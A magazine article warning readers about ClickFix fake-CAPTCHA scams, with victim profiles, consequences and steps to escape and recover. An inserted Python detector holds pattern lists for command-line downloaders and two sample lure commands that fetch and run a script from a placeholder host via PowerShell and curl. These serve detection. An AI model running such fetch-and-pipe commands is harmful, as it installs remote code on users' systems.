Don’t click ‘ClickFix’ boxes

You’re working on your laptop, searching websites for information, and suddenly a box pops up that indicates a vague problem with your browser. Do not, under any circumstance, follow the instruction in the box. It is a phishing scam called ClickFix and it is on the rise this past year according to multiple security research groups, including Check Point and Darktrace.

The scam requires the victim to copy code and primarily targets Windows systems, but in the past year it has spread to macOS as well. It is often initiated by a fake CAPTCHA authorization. After multiple failures, the malware will suggest an alternative authorization method that involves copying code and pasting it into the system. These scams typically show up on fake websites, but they can also show up on legitimate but infected websites.

Malicious actors don’t need sophisticated training to launch these attacks. ClickFix malware kits are sold by cybercriminal organizations and state-sponsored groups. But the scam is not limited to infected websites. Cybercriminals leverage the TikTok and Instagram user bases to spread ClickFix scams. They create AI-generated videos that claim to unlock premium features by running “cheat codes” in software, including digital games. When the videos go viral, they reach hundreds of thousands of views and victims.

Zero-Trust attitudes

Perhaps unremarkably, the primary victims are males under the age of 30. This demographic is more susceptible to social engineering and more comfortable hacking their own systems. Despite high digital literacy, young men are more confident in handling technical issues themselves. Members of the male-dominated gaming and tech culture, particularly Gen Z (12-29 year olds), are more than three times as likely to fall for online scams compared to baby boomers because they spend more time online where these scams proliferate. Women and older adults tend to exercise zero-trust attitudes more than young men and verify technical issues through official channels.

The scope of the damage caused by this crime is considerable. Victims suffer identity theft and financial loss and devices become part of illicit botnets. Businesses incur financial losses due to data breaches, recovery efforts, and potential legal liabilities. The average cost of a data breach can reach into the millions. ClickFix scams targeting critical infrastructure create severe consequences, potentially affecting public safety and national security. Disruptions in services like power, water, and transportation can lead to widespread chaos.


Protections

There are cybersecurity products against this kind of attack, but they are neither available nor affordable to individuals. The best defense is to be aware of the danger.

No company selling software will ask you to voluntarily “fix” problems yourself. Any flaw in the product will be corrected in regular updates, which is why you should set up automatic installation of updates. Adopting a zero-trust attitude with websites and any pop-up that requires interaction is crucial as well. Use ad blockers even if the website advises against them.
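As an added illustration, not taken from the article or from any vendor's product, the Python example below flags pasted text that looks like a command rather than a verification code, which is the step the fake CAPTCHA depends on. The indicator patterns, the function name `assess_pasted_text` and the sample strings are assumptions constructed for this example.

```python
import re

# Indicator patterns are assumptions of this example (common command-line
# traits), not a list taken from the article.
INDICATORS = {
    "interpreter": r"\b(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|osascript|bash|zsh)\b",
    "downloader": r"\b(curl|wget|iwr|irm|invoke-webrequest|invoke-restmethod|certutil|bitsadmin)\b",
    "url": r"https?://",
    "pipe_to_interpreter": r"\|\s*(iex|invoke-expression|sh|bash|zsh)\b",
    "hidden_or_encoded": r"(?<!\S)-(w|windowstyle)\s+hidden\b"
                         r"|(?<!\S)-(e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}",
    # Trailing comment that makes the pasted line read like a harmless check.
    "verification_comment": r"(?:^|\s)(?:#|//).*\b(captcha|verification|robot|human)\b",
}
COMPILED = {name: re.compile(rx, re.I) for name, rx in INDICATORS.items()}

# Constructed samples; example.invalid never resolves.
SAMPLES = {
    "code": "482913",
    "windows": 'powershell -w hidden -c "irm https://example.invalid/v | iex"'
               " # reCAPTCHA Verification ID: 4821",
    "macos": "curl -s https://example.invalid/i.sh | bash",
}


def assess_pasted_text(text):
    """Return (verdict, hits) for text a web page told the user to paste."""
    hits = sorted(name for name, rx in COMPILED.items() if rx.search(text))
    if not hits:
        verdict = "no command traits"
    elif len(hits) == 1:
        verdict = "suspicious"
    else:
        verdict = "looks like a command: do not run"
    return verdict, hits


if __name__ == "__main__":
    for label, text in SAMPLES.items():
        print(label, assess_pasted_text(text))
```

A real verification code carries no interpreter name, URL or pipe, so any hit on text a web page told you to paste is reason to stop.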

How to escape

But let’s say you inadvertently visited an infected website and the ClickFix box pops up. It will probably stop you from doing anything except click the box. Do not continue. First close the browser. On Windows that means pressing Ctrl + Shift + Esc to open the Task Manager. Find your browser in the list, select it, and click End Task. On Mac, press Command + Option + Esc to open the Force Quit Applications window. Select your browser and click Force Quit.

Next, disconnect from the Internet by turning off Wi-Fi or unplugging the Ethernet cable to prevent any potential data transmission. After closing the browser, clear your cache and cookies to remove any remnants of the fake site. Use antivirus or anti-malware software to run a full system scan to detect and remove any potential threats that may have been installed.

If you entered any personal information or passwords on the fake site, change those passwords immediately, especially for sensitive accounts like banking or email. Keep an eye on your financial accounts and online services for any suspicious activity. Report any unauthorized transactions to your bank or service provider.

Lou Covey

Lou Covey is the Chief Editor for Cyber Protection Magazine. In 50 years as a journalist he covered American politics, education, religious history, women’s fashion, music, marketing technology, renewable energy, semiconductors, avionics. He is currently focused on cybersecurity and artificial intelligence. He published a book on renewable energy policy in 2020 and is writing a second one on technology aptitude. He hosts the Crucial Tech podcast.
